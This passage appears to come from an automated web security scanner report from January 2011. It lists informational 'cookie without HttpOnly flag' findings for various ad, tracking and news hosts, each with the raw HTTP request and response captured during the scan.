2mB2yV7SyHaep1kc0pnTX1Qc/HzKFDmbdh3+t60ZExD/vR2iAE6pKe1RW2/VKzWWtrj/+vWMTJqMy6KoBls3cVklTZxj0UxrdA3I4yJL2OKgNmAH1FPWgdbdyfuXjzsNfYHjat3uSgUtGUpaBySrTnDVNyX5YanrliGmSmPduj8LhA4KqX2YlmOVFoyDQFpOGcgnSlNcNJ00sfOyYI0EutT6h+jdgkz1QsYDywfKPuWNTZ4xzyhLKndjXyrV+OabUYyXa0zgarUEmj9DZ9ISVT0Ib00Gn+eML8NG2PTlecukGp/CVFvlwLbepBNmq97MFUk0PW3PIS0CJypACtU6kUoxQY2OEYFTYNFJ2uxPeVH2/UEpOEGzASxS069mjpvdCw4bmy1/VIOcn2qE1N5k5tc1MqXjUzdty7zYp2QIKE1MArjDBEYVBC8iDElqY95xHnn/xH0nyKgpVKBBbhJ3uQr4Ko1Livxx0MjJEm3cCuBSwGwiodkkzT5/8QeB3PZQmb6DOXNitLk9xP2Eu8MhqIgnIvQ0UunQUiUnIYGB43AQ9mjtJ2tqaDgCaX2jI1u6Xyp5hG15mbLHdX1UVqq04ZRL18CIJr; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_us_1000000=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; Domain=.revsci.net; Expires=Thu, 22-Jan-2043 01:29:45 GMT; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:29:44 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

17.87. http://alex-johnson.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alex-johnson.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: alex-johnson.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=71247d98d365d957459ad2146ae86d57; expires=Sat, 25-Jan-2031 02:04:23 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close


17.88. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d775684/10/38973908/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d775684/10/38973908/decide.php HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 12:18:57 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a222
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 12:18:56 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1; expires=Thu, 22-Mar-2012 04:18:57 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0; expires=Thu, 22-Mar-2012 04:18:57 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 1

;

17.89. http://amch.questionmarket.com/adsc/d852149/4/40142779/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d852149/4/40142779/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d852149/4/40142779/decide.php?ord=1296350847 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:23:03 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC"
DL_S: a204
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 02:23:02 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; expires=Wed, 21-Mar-2012 18:23:03 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0; expires=Wed, 21-Mar-2012 18:23:03 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

17.90. http://api.bit.ly/shorten

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /shorten

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shorten HTTP/1.1
Host: api.bit.ly
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:21:50 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 104
Allow: GET, HEAD, POST
P3P: CP="CAO PSA OUR"
Set-Cookie: _xsrf=442abb1a273f4a0d80590533c0eff126; Path=/

{"errorCode": 203, "errorMessage": "You must be authenticated to access shorten", "statusCode": "ERROR"}

17.91. http://ar.voicefive.com/b/wc_beacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1296351006.909,wait-%3E10000,&1296351005834 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_G=method->-1,ts->1296351006; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:30:07 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296351006%2E909%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

17.92. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:30:06 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:30:06 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296351006; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26496

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087454",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...

17.93. http://articles.redacted/news/news.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://articles.redacted
Path:   /news/news.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/news.aspx HTTP/1.1
Host: articles.moneycentral.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA43
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a9c5053b2f704163858001bde4170892; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=FDEFD5726B4F41F2A069537932EBC97A; domain=.moneycentral.msn.com; expires=Thu, 18-Aug-2011 02:05:33 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 39029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.94. http://athima-chansanchai.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://athima-chansanchai.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: athima-chansanchai.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=604df4063ca91afa132a73bbd94df4dd; expires=Sat, 25-Jan-2031 02:04:32 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close


17.95. http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   //AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET //AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607 HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; AA002=0-0

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:29:41 GMT
X-DirectServer: whitepg_DS1
Content-Type: application/x-javascript
Content-Length: 12856
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=00058525BF050D44401A5E1461626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE1=+6jd3r4Ya10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE2=+6jd3raZf10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE3=+6jd3r4Wa10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE4=+6jd3rKba10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: AA002=1294100002-3786607; expires=Mon, 31 Jan 2011 01:29:41 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

var AAMB1='<!-- Javascript tag -->\r\n<!-- begin ZEDO for channel: Whitepages.com ROS , publisher: Whitepages.com , Ad Dimension: Super Banner - 728 x 90 -->\r\n<script language=\"JavaScript\">\r\nva
...[SNIP]...

17.96. http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   //AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET //AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607 HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; AA002=0-0

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:40:41 GMT
X-DirectServer: whitepg_DS0
Content-Type: application/x-javascript
Content-Length: 13325
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=0007062FC1990D44493592EB61626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE0=+6jd3r4Zf10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE1=+6jd3raaa10014+9qUEKJ8I6004G+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE3=+6jd3r4Wa10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE4=+6jd3rKba10014+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: AA002=1294100002-3786607; expires=Mon, 31 Jan 2011 01:40:41 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

var AAMB1='<!-- Javascript tag -->\r\n<!-- begin ZEDO for channel: Whitepages.com ROS , publisher: Whitepages.com , Ad Dimension: Super Banner - 728 x 90 -->\r\n<script language=\"JavaScript\">\r\nva
...[SNIP]...

17.97. http://atl.whitepages.com/AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: atl.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; GUID=00058525BF050D44401A5E1461626364; Sample=18; wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; LE2=+6jd3raZf10014+4; __qca=P0-1307497695-1296350983104; LE1=+6jd3r4Ya10014+4; LE4=+6jd3rKba10014+4; LE3=+6jd3r4Wa10014+4;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 17:50:18 GMT
X-DirectServer: whitepg_DS2
Content-Type: application/x-javascript
Content-Length: 11959
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: LE1=+65y4r4Ya10038+9KmJKJII6004G+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE3=+65y4r4Wa10024+9KmJKJ-V6004G+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
Set-Cookie: LE4=+65y4rKba10024+4; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=atl.whitepages.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

var AAMB1='<!-- Javascript tag -->\r\n<!-- begin ZEDO for channel: Whitepages.com ROS , publisher: Whitepages.com , Ad Dimension: Super Banner - 728 x 90 -->\r\n<script language=\"JavaScript\">\r\nva
...[SNIP]...

17.98. http://atl.whitepages.com/LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atl.whitepages.com
Path:   /LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: atl.whitepages.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
